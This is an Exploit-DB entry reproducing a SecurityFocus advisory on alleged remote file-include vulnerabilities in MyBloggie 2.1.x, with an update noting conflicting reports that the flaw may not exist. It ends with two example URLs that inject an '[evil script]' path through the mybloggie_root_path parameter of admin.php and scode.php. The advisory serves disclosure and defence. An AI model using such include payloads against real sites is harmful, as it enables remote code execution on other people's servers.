MyBloggie 2.1.x - Multiple Remote File Include Vulnerabilities

2006-06-02T00:00:00
ID EDB-ID:27957
Type exploitdb
Reporter ERNE
Modified 2006-06-02T00:00:00

Description

MyBloggie 2.1.x Multiple Remote File Include Vulnerabilities. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/18241/info

MyBloggie is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Update: Conflicting reports indicate that this issue does not exist in MyBloggie. This BID will be updated when more details are available.

http://www.example.com/blog/admin.php?mybloggie_root_path=[evil script]

http://www.example.com/blog/scode.php?mybloggie_root_path=[evil script]